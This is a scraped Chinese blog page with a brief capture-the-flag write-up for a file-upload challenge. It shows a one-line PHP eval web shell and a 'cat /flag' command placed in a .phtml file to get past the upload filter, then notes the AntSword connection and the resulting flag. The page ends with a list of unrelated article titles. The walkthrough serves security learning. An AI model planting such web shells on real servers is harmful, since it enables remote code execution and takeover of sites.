当前位置: 首页 > news >正文

[ACTF2020 新生赛]Upload1

news 2025/7/4 5:03:29

题目

以为是前端验证,试了一下PHP传不上去

可以创建一个1.phtml文件。对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。将以下代码写入该文件中

<script language='php'>@eval($_POST['md']);</script><script language='php'>system('cat /flag');</script>

上传成功 

 蚁剑链接拿下flag

flag{be23c7ed-bfa2-43d1-b5b9-22e9e8621960}

http://www.lryc.cn/news/526215.html

相关文章:

  • 【PyTorch】0.初识:从吃货角度理解张量
  • 医学图像分析工具09.1:Brainstorm安装教程
  • springboot基于Spring Boot的智慧养老服务系统的设计与实现
  • Linux内核中IPoIB驱动模块的初始化与实现
  • WPS计算机二级•幻灯片的基础操作
  • .NET9增强OpenAPI规范,不再内置swagger
  • 基于微信小程序的民宿预订管理系统
  • 网络(三) 协议
  • 【深度解析Java 20天速成】04_IDEA的安装与使用
  • gitlab处理空文件夹的提交或空文件夹提交失败
  • 计算机网络之链路层
  • Arduino大师练成手册 -- 读取红外接收数据
  • 【Efficient AIGC】SiTo: Similarity-based Token Pruning (AAAI-2025)
  • 数据标注开源框架 Label Studio
  • MyBatis最佳实践:MyBatis 框架的缓存
  • 基于LangGraph、Groq和Tavily打造可以调用外部搜索引擎工具的对话机器人(核心代码 万字详解)
  • 衡量算法性能的量级标准:算法复杂度
  • PHP校园助手系统小程序
  • 如何在Spring Boot项目中高效集成Spring Security
  • 【PostgreSQL内核学习 —— (WindowAgg(一))】
  • PAT甲级-1020 Tree Traversals
  • LVGL+FreeRTOS实战项目:智能健康助手(Max30102篇)
  • 人脸识别【python-基于OpenCV】
  • redis常用命令和内部编码
  • UI操作总结
  • 数据结构——实验八·学生管理系统
  • 力扣hot100-->滑动窗口、贪心
  • Linux 内核中的高效并发处理:深入理解 hlist_add_head_rcu 与 NAPI 接口
  • centos哪个版本建站好?centos最稳定好用的版本
  • 软件越跑越慢的原因分析